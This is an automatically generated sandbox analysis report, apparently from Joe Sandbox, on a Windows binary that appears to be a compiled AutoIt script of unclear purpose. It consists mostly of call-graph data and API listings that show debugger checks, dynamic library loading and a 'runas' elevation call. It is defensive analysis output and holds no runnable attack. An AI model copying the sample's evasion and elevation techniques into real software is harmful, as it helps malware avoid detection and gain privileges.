3 library calls 93882->93963 93960 f07bda 47 API calls __getptd_noexit 93883->93960 93884 f0b86b 93884->93862 93948 f13bf2 93886->93948 93888 f0b099 93959 f06e10 8 API calls __ftell_nolock 93888->93959 93891 f0b0ee 93961 f07c0e 47 API 
calls __getptd_noexit 93891->93961 93893 f0b12a 93895 f0b44b 93893->93895 93964 f07a0d 47 API calls 2 library calls 93893->93964 93897 f0b463 93895->93897 93898 f0b7b8 WriteFile 93895->93898 93896 f0b0f5 93962 f06e10 8 API calls __ftell_nolock 93896->93962 93902 f0b55a 93897->93902 93906 f0b479 93897->93906 93900 f0b7e1 GetLastError 93898->93900 93910 f0b410 93898->93910 93900->93910 93913 f0b663 93902->93913 93916 f0b565 93902->93916 93903 f0b150 GetConsoleMode 93903->93895 93905 f0b189 93903->93905 93904 f0b81b 93904->93908 93969 f07c0e 47 API calls __getptd_noexit 93904->93969 93905->93895 93911 f0b199 GetConsoleCP 93905->93911 93906->93904 93907 f0b4e9 WriteFile 93906->93907 93907->93900 93912 f0b526 93907->93912 93971 f0a70c 93908->93971 93910->93904 93910->93908 93915 f0b7f7 93910->93915 93911->93910 93935 f0b1c2 93911->93935 93912->93906 93912->93910 93927 f0b555 93912->93927 93913->93904 93917 f0b6d8 WideCharToMultiByte 93913->93917 93914 f0b843 93970 f07bda 47 API calls __getptd_noexit 93914->93970 93919 f0b812 93915->93919 93920 f0b7fe 93915->93920 93916->93904 93921 f0b5de WriteFile 93916->93921 93917->93900 93932 f0b71f 93917->93932 93968 f07bed 47 API calls 3 library calls 93919->93968 93966 f07c0e 47 API calls __getptd_noexit 93920->93966 93921->93900 93923 f0b62d 93921->93923 93923->93910 93923->93916 93923->93927 93925 f0b727 WriteFile 93929 f0b77a GetLastError 93925->93929 93925->93932 93926 f0b803 93967 f07bda 47 API calls __getptd_noexit 93926->93967 93927->93910 93929->93932 93931 f140f7 59 API calls __chsize_nolock 93931->93935 93932->93910 93932->93913 93932->93925 93932->93927 93933 f15884 WriteConsoleW CreateFileW __chsize_nolock 93937 f0b2f6 93933->93937 93934 f0b28f WideCharToMultiByte 93934->93910 93936 f0b2ca WriteFile 93934->93936 93935->93910 93935->93931 93935->93934 93935->93937 93965 f01688 57 API calls __isleadbyte_l 93935->93965 93936->93900 93936->93937 93937->93900 93937->93910 93937->93933 93937->93935 93938 f0b321 WriteFile 
93937->93938 93938->93900 93938->93937 93939->93847 93940->93860 93941->93863 93942->93862 93943->93860 93944->93850 93945->93854 93946->93860 93947->93868 93949 f13c0a 93948->93949 93950 f13bfd 93948->93950 93952 f07c0e __ftell_nolock 47 API calls 93949->93952 93954 f13c16 93949->93954 93951 f07c0e __ftell_nolock 47 API calls 93950->93951 93953 f13c02 93951->93953 93955 f13c37 93952->93955 93953->93893 93954->93893 93956 f06e10 __ftell_nolock 8 API calls 93955->93956 93956->93953 93957->93881 93958->93888 93959->93908 93960->93891 93961->93896 93962->93908 93963->93886 93964->93903 93965->93935 93966->93926 93967->93908 93968->93908 93969->93914 93970->93908 93972 f0a714 93971->93972 93973 f0a716 IsProcessorFeaturePresent 93971->93973 93972->93884 93975 f137b0 93973->93975 93976 f1375f ___raise_securityfailure 5 API calls 93975->93976 93977 f13893 93976->93977 93977->93884 93978->93813 93979->93815 94002 f0aba4 93980->94002 93982 f0eb00 94015 f0ab1e 48 API calls 2 library calls 93982->94015 93984 f0eaaa 93984->93982 93986 f0aba4 __lseek_nolock 47 API calls 93984->93986 93994 f0eade 93984->93994 93985 f0eb08 93993 f0eb2a 93985->93993 94016 f07bed 47 API calls 3 library calls 93985->94016 93988 f0ead5 93986->93988 93987 f0aba4 __lseek_nolock 47 API calls 93989 f0eaea CloseHandle 93987->93989 93991 f0aba4 __lseek_nolock 47 API calls 93988->93991 93989->93982 93992 f0eaf6 GetLastError 93989->93992 93991->93994 93992->93982 93993->93837 93994->93982 93994->93987 93995->93822 93996->93827 93997->93837 93998->93827 93999->93825 94000->93830 94001->93827 94003 f0abc4 94002->94003 94004 f0abaf 94002->94004 94009 f0abe9 94003->94009 94019 f07bda 47 API calls __getptd_noexit 94003->94019 94017 f07bda 47 API calls __getptd_noexit 94004->94017 94006 f0abb4 94018 f07c0e 47 API calls __getptd_noexit 94006->94018 94009->93984 94010 f0abf3 94020 f07c0e 47 API calls __getptd_noexit 94010->94020 94012 f0abfb 94021 f06e10 8 API calls __ftell_nolock 94012->94021 94013 f0abbc 
94013->93984 94015->93985 94016->93993 94017->94006 94018->94013 94019->94010 94020->94012 94021->94013 94108 ee4214 94022->94108 94027 f54f73 94029 ee4252 84 API calls 94027->94029 94028 ee41d4 LoadLibraryExW 94118 ee4291 94028->94118 94031 f54f7a 94029->94031 94033 ee4291 3 API calls 94031->94033 94035 f54f82 94033->94035 94144 ee44ed 94035->94144 94036 ee41fb 94036->94035 94037 ee4207 94036->94037 94039 ee4252 84 API calls 94037->94039 94041 ee420c 94039->94041 94041->93562 94041->93564 94043 f54fa9 94152 ee4950 94043->94152 94327 f01e46 94046->94327 94050 f26918 _wcschr __ftell_nolock 94049->94050 94051 f01dfc __wsplitpath 47 API calls 94050->94051 94054 f2692e _wcscat _wcscpy 94050->94054 94052 f2695d 94051->94052 94053 f01dfc __wsplitpath 47 API calls 94052->94053 94053->94054 94054->93584 94056 f2bfb1 __ftell_nolock 94055->94056 94057 eff4ea 48 API calls 94056->94057 94058 f2c00e 94057->94058 94059 ee47b7 48 API calls 94058->94059 94060 f2c018 94059->94060 94061 f2bdb4 GetSystemTimeAsFileTime 94060->94061 94062 f2c023 94061->94062 94063 ee4517 83 API calls 94062->94063 94064 f2c036 _wcscmp 94063->94064 94065 f2c107 94064->94065 94066 f2c05a 94064->94066 94067 f2c56d 94 API calls 94065->94067 94370 f2c56d 94066->94370 94069 f2c0d3 _wcscat 94067->94069 94072 ee44ed 64 API calls 94069->94072 94097 f2c110 94069->94097 94071 f01dfc __wsplitpath 47 API calls 94076 f2c088 _wcscat _wcscpy 94071->94076 94073 f2c12c 94072->94073 94074 ee44ed 64 API calls 94073->94074 94075 f2c13c 94074->94075 94077 ee44ed 64 API calls 94075->94077 94078 f01dfc __wsplitpath 47 API calls 94076->94078 94079 f2c157 94077->94079 94078->94069 94080 ee44ed 64 API calls 94079->94080 94081 f2c167 94080->94081 94082 ee44ed 64 API calls 94081->94082 94083 f2c182 94082->94083 94084 ee44ed 64 API calls 94083->94084 94085 f2c192 94084->94085 94086 ee44ed 64 API calls 94085->94086 94087 f2c1a2 94086->94087 94088 ee44ed 64 API calls 94087->94088 94089 f2c1b2 94088->94089 94353 f2c71a GetTempPathW 
GetTempFileNameW 94089->94353 94091 f2c1be 94092 f03499 117 API calls 94091->94092 94100 f2c1cf 94092->94100 94093 f2c289 94094 f035e4 __fcloseall 83 API calls 94093->94094 94095 f2c294 94094->94095 94095->94097 94098 f2c342 CopyFileW 94095->94098 94101 f2c2b8 94095->94101 94096 ee44ed 64 API calls 94096->94100 94097->93590 94098->94097 94099 f2c32d 94098->94099 94099->94097 94367 f2c6d9 CreateFileW 94099->94367 94100->94093 94100->94096 94100->94097 94354 f02aae 94100->94354 94376 f2b965 118 API calls __fcloseall 94101->94376 94105->93553 94106->93574 94107->93581 94157 ee4339 94108->94157 94112 ee41bb 94115 f03499 94112->94115 94113 ee4244 FreeLibrary 94113->94112 94114 ee423c 94114->94112 94114->94113 94165 f034ae 94115->94165 94117 ee41c8 94117->94027 94117->94028 94244 ee42e4 94118->94244 94122 ee41ec 94125 ee4380 94122->94125 94123 ee42c1 FreeLibrary 94123->94122 94124 ee42b8 94124->94122 94124->94123 94126 eff4ea 48 API calls 94125->94126 94127 ee4395 94126->94127 94252 ee47b7 94127->94252 94129 ee43a1 ___crtGetEnvironmentStringsW 94130 ee43dc 94129->94130 94132 ee4499 94129->94132 94133 ee44d1 94129->94133 94131 ee4950 57 API calls 94130->94131 94139 ee43e5 94131->94139 94255 ee406b CreateStreamOnHGlobal 94132->94255 94266 f2c750 93 API calls 94133->94266 94136 ee44ed 64 API calls 94136->94139 94138 ee4479 94138->94036 94139->94136 94139->94138 94140 f54ed7 94139->94140 94261 ee4517 94139->94261 94141 ee4517 83 API calls 94140->94141 94142 f54eeb 94141->94142 94143 ee44ed 64 API calls 94142->94143 94143->94138 94145 ee44ff 94144->94145 94146 f54fc0 94144->94146 94284 f0381e 94145->94284 94149 f2bf5a 94304 f2bdb4 94149->94304 94151 f2bf70 94151->94043 94153 ee495f 94152->94153 94154 f55002 94152->94154 94309 f03e65 94153->94309 94156 ee4967 94161 ee434b 94157->94161 94160 ee4321 LoadLibraryA GetProcAddress 94160->94114 94162 ee422f 94161->94162 94163 ee4354 LoadLibraryA 94161->94163 94162->94114 94162->94160 94163->94162 94164 ee4365 GetProcAddress 
94163->94164 94164->94162 94168 f034ba __wsopen_helper 94165->94168 94166 f034cd 94213 f07c0e 47 API calls __getptd_noexit 94166->94213 94168->94166 94170 f034fe 94168->94170 94169 f034d2 94214 f06e10 8 API calls __ftell_nolock 94169->94214 94184 f0e4c8 94170->94184 94173 f03503 94174 f03519 94173->94174 94175 f0350c 94173->94175 94177 f03543 94174->94177 94178 f03523 94174->94178 94215 f07c0e 47 API calls __getptd_noexit 94175->94215 94198 f0e5e0 94177->94198 94216 f07c0e 47 API calls __getptd_noexit 94178->94216 94180 f034dd __wsopen_helper @_EH4_CallFilterFunc@8 94180->94117 94185 f0e4d4 __wsopen_helper 94184->94185 94186 f07cf4 __lock 47 API calls 94185->94186 94196 f0e4e2 94186->94196 94187 f0e552 94218 f0e5d7 94187->94218 94188 f0e559 94223 f069d0 47 API calls __crtLCMapStringA_stat 94188->94223 94191 f0e560 94191->94187 94193 f0e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94191->94193 94192 f0e5cc __wsopen_helper 94192->94173 94193->94187 94194 f07d7c __mtinitlocknum 47 API calls 94194->94196 94196->94187 94196->94188 94196->94194 94221 f04e5b 48 API calls __lock 94196->94221 94222 f04ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94196->94222 94199 f0e600 __wopenfile 94198->94199 94200 f0e61a 94199->94200 94212 f0e7d5 94199->94212 94230 f0185b 59 API calls 2 library calls 94199->94230 94228 f07c0e 47 API calls __getptd_noexit 94200->94228 94202 f0e61f 94229 f06e10 8 API calls __ftell_nolock 94202->94229 94204 f0e838 94225 f163c9 94204->94225 94206 f0354e 94217 f03570 LeaveCriticalSection LeaveCriticalSection _fprintf 94206->94217 94208 f0e7ce 94208->94212 94231 f0185b 59 API calls 2 library calls 94208->94231 94210 f0e7ed 94210->94212 94232 f0185b 59 API calls 2 library calls 94210->94232 94212->94200 94212->94204 94213->94169 94214->94180 94215->94180 94216->94180 94217->94180 94224 f07e58 LeaveCriticalSection 94218->94224 94220 f0e5de 94220->94192 94221->94196 94222->94196 94223->94191 94224->94220 94233 f15bb1 94225->94233 94227 
f163e2 94227->94206 94228->94202 94229->94206 94230->94208 94231->94210 94232->94212 94234 f15bbd __wsopen_helper 94233->94234 94235 f15bcf 94234->94235 94237 f15c06 94234->94237 94236 f07c0e __ftell_nolock 47 API calls 94235->94236 94238 f15bd4 94236->94238 94239 f15c78 __wsopen_helper 110 API calls 94237->94239 94240 f06e10 __ftell_nolock 8 API calls 94238->94240 94241 f15c23 94239->94241 94243 f15bde __wsopen_helper 94240->94243 94242 f15c4c __wsopen_helper LeaveCriticalSection 94241->94242 94242->94243 94243->94227 94248 ee42f6 94244->94248 94247 ee42cc LoadLibraryA GetProcAddress 94247->94124 94249 ee42aa 94248->94249 94250 ee42ff LoadLibraryA 94248->94250 94249->94124 94249->94247 94250->94249 94251 ee4310 GetProcAddress 94250->94251 94251->94249 94253 eff4ea 48 API calls 94252->94253 94254 ee47c9 94253->94254 94254->94129 94256 ee4085 FindResourceExW 94255->94256 94260 ee40a2 94255->94260 94257 f54f16 LoadResource 94256->94257 94256->94260 94258 f54f2b SizeofResource 94257->94258 94257->94260 94259 f54f3f LockResource 94258->94259 94258->94260 94259->94260 94260->94130 94262 ee4526 94261->94262 94265 f54fe0 94261->94265 94267 f03a8d 94262->94267 94264 ee4534 94264->94139 94266->94130 94268 f03a99 __wsopen_helper 94267->94268 94269 f03aa7 94268->94269 94270 f03acd 94268->94270 94280 f07c0e 47 API calls __getptd_noexit 94269->94280 94272 f04e1c __lock_file 48 API calls 94270->94272 94275 f03ad3 94272->94275 94273 f03aac 94281 f06e10 8 API calls __ftell_nolock 94273->94281 94282 f039fe 81 API calls 2 library calls 94275->94282 94277 f03ae2 94283 f03b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94277->94283 94279 f03ab7 __wsopen_helper 94279->94264 94280->94273 94281->94279 94282->94277 94283->94279 94287 f03839 94284->94287 94286 ee4510 94286->94149 94288 f03845 __wsopen_helper 94287->94288 94289 f03888 94288->94289 94290 f0385b _memset 94288->94290 94291 f03880 __wsopen_helper 94288->94291 94292 f04e1c __lock_file 48 API calls 94289->94292 94300 
f07c0e 47 API calls __getptd_noexit 94290->94300 94291->94286 94294 f0388e 94292->94294 94302 f0365b 62 API calls 5 library calls 94294->94302 94295 f03875 94301 f06e10 8 API calls __ftell_nolock 94295->94301 94298 f038a4 94303 f038c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94298->94303 94300->94295 94301->94291 94302->94298 94303->94291 94307 f0344a GetSystemTimeAsFileTime 94304->94307 94306 f2bdc3 94306->94151 94308 f03478 __aulldiv 94307->94308 94308->94306 94310 f03e71 __wsopen_helper 94309->94310 94311 f03e94 94310->94311 94312 f03e7f 94310->94312 94314 f04e1c __lock_file 48 API calls 94311->94314 94323 f07c0e 47 API calls __getptd_noexit 94312->94323 94316 f03e9a 94314->94316 94315 f03e84 94324 f06e10 8 API calls __ftell_nolock 94315->94324 94325 f03b0c 55 API calls 2 library calls 94316->94325 94319 f03ea5 94326 f03ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94319->94326 94321 f03eb7 94322 f03e8f __wsopen_helper 94321->94322 94322->94156 94323->94315 94324->94322 94325->94319 94326->94321 94328 f01e55 94327->94328 94329 f01e61 94327->94329 94328->94329 94338 f01ed4 94328->94338 94346 f09d6b 47 API calls __ftell_nolock 94328->94346 94351 f07c0e 47 API calls __getptd_noexit 94329->94351 94331 f02019 94336 f01e41 94331->94336 94352 f06e10 8 API calls __ftell_nolock 94331->94352 94334 f01fa0 94334->94329 94334->94336 94339 f01fb0 94334->94339 94335 f01f5f 94335->94329 94337 f01f7b 94335->94337 94348 f09d6b 47 API calls __ftell_nolock 94335->94348 94336->93576 94337->94329 94337->94336 94342 f01f91 94337->94342 94338->94329 94345 f01f41 94338->94345 94347 f09d6b 47 API calls __ftell_nolock 94338->94347 94350 f09d6b 47 API calls __ftell_nolock 94339->94350 94349 f09d6b 47 API calls __ftell_nolock 94342->94349 94345->94334 94345->94335 94346->94338 94347->94345 94348->94337 94349->94336 94350->94336 94351->94331 94352->94336 94353->94091 94355 f02aba __wsopen_helper 94354->94355 94356 f02ad4 94355->94356 94357 f02aec 94355->94357 94358 f02ae4 
__wsopen_helper 94355->94358 94389 f07c0e 47 API calls __getptd_noexit 94356->94389 94359 f04e1c __lock_file 48 API calls 94357->94359 94358->94100 94361 f02af2 94359->94361 94377 f02957 94361->94377 94362 f02ad9 94390 f06e10 8 API calls __ftell_nolock 94362->94390 94368 f2c715 94367->94368 94369 f2c6ff SetFileTime CloseHandle 94367->94369 94368->94097 94369->94368 94374 f2c581 __tzset_nolock _wcscmp 94370->94374 94371 ee44ed 64 API calls 94371->94374 94372 f2bf5a GetSystemTimeAsFileTime 94372->94374 94373 f2c05f 94373->94071 94373->94097 94374->94371 94374->94372 94374->94373 94375 ee4517 83 API calls 94374->94375 94375->94374 94376->94099 94380 f02966 94377->94380 94385 f02984 94377->94385 94378 f02974 94392 f07c0e 47 API calls __getptd_noexit 94378->94392 94380->94378 94381 f0299c ___crtGetEnvironmentStringsW 94380->94381 94380->94385 94381->94385 94386 f02c84 __flush 78 API calls 94381->94386 94387 f02933 __ftell_nolock 47 API calls 94381->94387 94388 f0af61 __flswbuf 78 API calls 94381->94388 94394 f08e63 78 API calls 5 library calls 94381->94394 94382 f02979 94393 f06e10 8 API calls __ftell_nolock 94382->94393 94391 f02b24 LeaveCriticalSection LeaveCriticalSection _fprintf 94385->94391 94386->94381 94387->94381 94388->94381 94389->94362 94390->94358 94391->94358 94392->94382 94393->94385 94394->94381 94396 f26529 94395->94396 94397 f26cc4 FindFirstFileW 94395->94397 94396->93453 94397->94396 94398 f26cd9 FindClose 94397->94398 94398->94396 94399->93635 94400->93601 94401->93609 94402->93611 94403->93618 94404->93627 94405->93629 94406->93633 94407->93320 94408->93320 94409->93321 94410->93321 94411->93312 94412->93307 94413->93322 94414->93334 94415->93334 94416->93335 94417->93352 94418->93357 94419 f2bb64 94420 f2bb71 94419->94420 94423 f2bb77 94419->94423 94421 f01c9d _free 47 API calls 94420->94421 94421->94423 94422 f2bb88 94425 f2bb9a 94422->94425 94426 f01c9d _free 47 API calls 94422->94426 94423->94422 94424 f01c9d _free 47 API calls 94423->94424 
94424->94422 94426->94425 94427 f519dd 94432 ee4a30 94427->94432 94429 f519f1 94452 f00f0a 52 API calls __cinit 94429->94452 94431 f519fb 94433 ee4a40 __ftell_nolock 94432->94433 94434 eed7f7 48 API calls 94433->94434 94435 ee4af6 94434->94435 94453 ee5374 94435->94453 94437 ee4aff 94460 ee363c 94437->94460 94444 eed7f7 48 API calls 94445 ee4b32 94444->94445 94482 ee49fb 94445->94482 94447 ee4b43 Mailbox 94447->94429 94448 ee61a6 48 API calls 94449 ee4b3d _wcscat Mailbox __wsetenvp 94448->94449 94449->94447 94449->94448 94450 eece19 48 API calls 94449->94450 94451 ee64cf 48 API calls 94449->94451 94450->94449 94451->94449 94452->94431 94496 f0f8a0 94453->94496 94456 eece19 48 API calls 94457 ee53a7 94456->94457 94498 ee660f 94457->94498 94459 ee53b1 Mailbox 94459->94437 94461 ee3649 __ftell_nolock 94460->94461 94525 ee366c GetFullPathNameW 94461->94525 94463 ee365a 94464 ee6a63 48 API calls 94463->94464 94465 ee3669 94464->94465 94466 ee518c 94465->94466 94467 ee5197 94466->94467 94468 ee519f 94467->94468 94469 f51ace 94467->94469 94527 ee5130 94468->94527 94470 ee6b4a 48 API calls 94469->94470 94473 f51adb __wsetenvp 94470->94473 94472 ee4b18 94476 ee64cf 94472->94476 94474 efee75 48 API calls 94473->94474 94475 f51b07 ___crtGetEnvironmentStringsW 94474->94475 94477 ee651b 94476->94477 94481 ee64dd ___crtGetEnvironmentStringsW 94476->94481 94479 eff4ea 48 API calls 94477->94479 94478 eff4ea 48 API calls 94480 ee4b29 94478->94480 94479->94481 94480->94444 94481->94478 94537 eebcce 94482->94537 94485 ee4a2b 94485->94449 94486 f541cc RegQueryValueExW 94487 f541e5 94486->94487 94488 f54246 RegCloseKey 94486->94488 94489 eff4ea 48 API calls 94487->94489 94490 f541fe 94489->94490 94491 ee47b7 48 API calls 94490->94491 94492 f54208 RegQueryValueExW 94491->94492 94493 f54224 94492->94493 94495 f5423b 94492->94495 94494 ee6a63 48 API calls 94493->94494 94494->94495 94495->94488 94497 ee5381 GetModuleFileNameW 94496->94497 94497->94456 94499 f0f8a0 __ftell_nolock 
94498->94499 94500 ee661c GetFullPathNameW 94499->94500 94505 ee6a63 94500->94505 94502 ee6643 94516 ee6571 94502->94516 94506 ee6adf 94505->94506 94507 ee6a6f __wsetenvp 94505->94507 94521 eeb18b 94506->94521 94509 ee6a8b 94507->94509 94510 ee6ad7 94507->94510 94512 ee6b4a 48 API calls 94509->94512 94520 eec369 48 API calls 94510->94520 94513 ee6a95 94512->94513 94515 efee75 48 API calls 94513->94515 94514 ee6ab6 ___crtGetEnvironmentStringsW 94514->94502 94515->94514 94517 ee657f 94516->94517 94518 eeb18b 48 API calls 94517->94518 94519 ee658f 94518->94519 94519->94459 94520->94514 94522 eeb199 94521->94522 94524 eeb1a2 ___crtGetEnvironmentStringsW 94521->94524 94523 eebdfa 48 API calls 94522->94523 94522->94524 94523->94524 94524->94514 94526 ee368a 94525->94526 94526->94463 94528 ee513f __wsetenvp 94527->94528 94529 f51b27 94528->94529 94530 ee5151 94528->94530 94532 ee6b4a 48 API calls 94529->94532 94531 eebb85 48 API calls 94530->94531 94534 ee515e ___crtGetEnvironmentStringsW 94531->94534 94533 f51b34 94532->94533 94535 efee75 48 API calls 94533->94535 94534->94472 94536 f51b57 ___crtGetEnvironmentStringsW 94535->94536 94538 eebce8 94537->94538 94542 ee4a0a RegOpenKeyExW 94537->94542 94539 eff4ea 48 API calls 94538->94539 94540 eebcf2 94539->94540 94541 efee75 48 API calls 94540->94541 94541->94542 94542->94485 94542->94486 94543 f59bec 94558 ef0ae0 Mailbox ___crtGetEnvironmentStringsW 94543->94558 94545 ef1526 Mailbox 94639 f2cc5c 86 API calls 4 library calls 94545->94639 94548 eff4ea 48 API calls 94549 eefec8 94548->94549 94549->94548 94550 ef0509 94549->94550 94551 ef1473 94549->94551 94553 eeffe1 Mailbox 94549->94553 94554 ef146e 94549->94554 94556 ee6eed 48 API calls 94549->94556 94559 f5a246 94549->94559 94567 f197ed InterlockedDecrement 94549->94567 94568 eed7f7 48 API calls 94549->94568 94569 f5a30e 94549->94569 94571 f00f0a 52 API calls __cinit 94549->94571 94573 f5a973 94549->94573 94577 ef15b5 94549->94577 94634 ef1820 331 API calls 2 library calls 
94549->94634 94635 ef1d10 59 API calls Mailbox 94549->94635 94642 f2cc5c 86 API calls 4 library calls 94550->94642 94641 f2cc5c 86 API calls 4 library calls 94551->94641 94561 ee6eed 48 API calls 94554->94561 94556->94549 94558->94545 94558->94549 94558->94553 94570 eece19 48 API calls 94558->94570 94576 f3e822 331 API calls 94558->94576 94578 eefe30 331 API calls 94558->94578 94579 f5a706 94558->94579 94581 eff4ea 48 API calls 94558->94581 94582 f197ed InterlockedDecrement 94558->94582 94586 f40d09 94558->94586 94589 f2b55b 94558->94589 94593 f40d1d 94558->94593 94596 f3f0ac 94558->94596 94628 f2a6ef 94558->94628 94636 f3ef61 82 API calls 2 library calls 94558->94636 94565 ee6eed 48 API calls 94559->94565 94560 f5a922 94561->94553 94565->94553 94566 f5a873 94567->94549 94568->94549 94569->94553 94637 f197ed InterlockedDecrement 94569->94637 94570->94558 94571->94549 94643 f2cc5c 86 API calls 4 library calls 94573->94643 94575 f5a982 94576->94558 94640 f2cc5c 86 API calls 4 library calls 94577->94640 94578->94558 94638 f2cc5c 86 API calls 4 library calls 94579->94638 94581->94558 94582->94558 94644 f3f8ae 94586->94644 94588 f40d19 94588->94558 94590 f2b564 94589->94590 94592 f2b569 94589->94592 94742 f2a4d5 94590->94742 94592->94558 94594 f3f8ae 129 API calls 94593->94594 94595 f40d2d 94594->94595 94595->94558 94597 eed7f7 48 API calls 94596->94597 94598 f3f0c0 94597->94598 94599 eed7f7 48 API calls 94598->94599 94600 f3f0c8 94599->94600 94601 eed7f7 48 API calls 94600->94601 94602 f3f0d0 94601->94602 94603 ee936c 81 API calls 94602->94603 94615 f3f0de 94603->94615 94604 ee6a63 48 API calls 94604->94615 94605 f3f2cc 94606 f3f2f9 Mailbox 94605->94606 94774 ee6b68 48 API calls 94605->94774 94606->94558 94608 f3f2b3 94609 ee518c 48 API calls 94608->94609 94612 f3f2c0 94609->94612 94610 f3f2ce 94614 ee518c 48 API calls 94610->94614 94611 ee6eed 48 API calls 94611->94615 94765 ee510d 94612->94765 94613 eec799 48 API calls 94613->94615 94618 f3f2dd 94614->94618 
94615->94604 94615->94605 94615->94606 94615->94608 94615->94610 94615->94611 94615->94613 94616 eebdfa 48 API calls 94615->94616 94619 eebdfa 48 API calls 94615->94619 94625 ee936c 81 API calls 94615->94625 94626 ee518c 48 API calls 94615->94626 94627 ee510d 48 API calls 94615->94627 94620 f3f175 CharUpperBuffW 94616->94620 94621 ee510d 48 API calls 94618->94621 94622 f3f23a CharUpperBuffW 94619->94622 94623 eed645 53 API calls 94620->94623 94621->94605 94764 efd922 55 API calls 2 library calls 94622->94764 94623->94615 94625->94615 94626->94615 94627->94615 94629 f2a6fb 94628->94629 94630 eff4ea 48 API calls 94629->94630 94631 f2a709 94630->94631 94632 f2a717 94631->94632 94633 eed7f7 48 API calls 94631->94633 94632->94558 94633->94632 94634->94549 94635->94549 94636->94558 94637->94553 94638->94545 94639->94553 94640->94553 94641->94566 94642->94560 94643->94575 94645 ee936c 81 API calls 94644->94645 94646 f3f8ea 94645->94646 94653 f3f92c Mailbox 94646->94653 94680 f40567 94646->94680 94648 f3f984 Mailbox 94649 f3fb8b 94648->94649 94648->94653 94656 ee936c 81 API calls 94648->94656 94722 f429e8 48 API calls ___crtGetEnvironmentStringsW 94648->94722 94723 f3fda5 60 API calls 2 library calls 94648->94723 94650 f3fb95 94649->94650 94651 f3fcfa 94649->94651 94693 f3f70a 94650->94693 94727 f40688 89 API calls Mailbox 94651->94727 94653->94588 94655 f3fd07 94655->94650 94657 f3fd13 94655->94657 94656->94648 94657->94653 94662 f3fbc9 94707 efed18 94662->94707 94665 f3fbe3 94724 f2cc5c 86 API calls 4 library calls 94665->94724 94666 f3fbfd 94711 efc050 94666->94711 94669 f3fbee GetCurrentProcess TerminateProcess 94669->94666 94670 f3fc14 94672 ef1b90 48 API calls 94670->94672 94679 f3fc3e 94670->94679 94671 f3fd65 94671->94653 94676 f3fd7e FreeLibrary 94671->94676 94673 f3fc2d 94672->94673 94725 f4040f 105 API calls _free 94673->94725 94674 ef1b90 48 API calls 94674->94679 94676->94653 94679->94671 94679->94674 94726 eedcae 50 API calls Mailbox 94679->94726 94728 f4040f 
[Control-flow graph (continued): node and edge data omitted. Windows API calls reached in this region of the graph: CharLowerBuffW, VirtualProtect, PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject, DestroyWindow, LoadStringW, GetStartupInfoW, GetProcessHeap, HeapAlloc, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetFileType, GetStdHandle, GetModuleFileNameW, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsThemeActive, SystemParametersInfoW, GetCurrentDirectoryW, SetCurrentDirectoryW, MessageBoxA, GetOpenFileNameW, GetLongPathNameW, GetSystemTimeAsFileTime, SetFilePointerEx, ReadFile, CloseHandle, GetStringTypeW, GetPEB, Sleep, CoInitialize, CreateThread, GetVersionExW, LoadLibraryA, GetProcAddress, FreeLibrary, GetSystemInfo, GetNativeSystemInfo, RegOpenKeyExW, RegQueryValueExW, RegCloseKey.]

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph for the function at f0b043 (basic blocks f0b043 through f0b86c): node and edge data omitted. Windows API calls reached: GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile, GetLastError.]
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 22bc6ac2c0cc63219f5b042fac733a7dffda688f5ba0da2b46cb52292a1ac086
• Instruction ID: f58832af7211c82a2f48e3d23775b65ed924b92b8e065018ff911c40a717fa2e
• Opcode Fuzzy Hash: 22bc6ac2c0cc63219f5b042fac733a7dffda688f5ba0da2b46cb52292a1ac086
• Instruction Fuzzy Hash: C7325A75F022288BDB24CF14DC81AE9B7B5FB4A310F5841D9E40AE7A91D7349E81EF52

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00EE3AA3,?), ref: 00EE3D45
• IsDebuggerPresent.KERNEL32(?,?,?,?,00EE3AA3,?), ref: 00EE3D57
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00FA1148,00FA1130,?,?,?,?,00EE3AA3,?), ref: 00EE3DC8
  • Part of subcall function 00EE6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00EE3DEE,00FA1148,?,?,?,?,?,00EE3AA3,?), ref: 00EE6471
• SetCurrentDirectoryW.KERNEL32(?,?,?,00EE3AA3,?), ref: 00EE3E48
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F928F4,00000010), ref: 00F51CCE
• SetCurrentDirectoryW.KERNEL32(?,00FA1148,?,?,?,?,?,00EE3AA3,?), ref: 00F51D06
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F7DAB4,00FA1148,?,?,?,?,?,00EE3AA3,?), ref: 00F51D89
• ShellExecuteW.SHELL32(00000000,?,?,?,?,00EE3AA3), ref: 00F51D90
  • Part of subcall function 00EE3E6E: GetSysColorBrush.USER32(0000000F), ref: 00EE3E79
  • Part of subcall function 00EE3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00EE3E88
  • Part of subcall function 00EE3E6E: LoadIconW.USER32(00000063), ref: 00EE3E9E
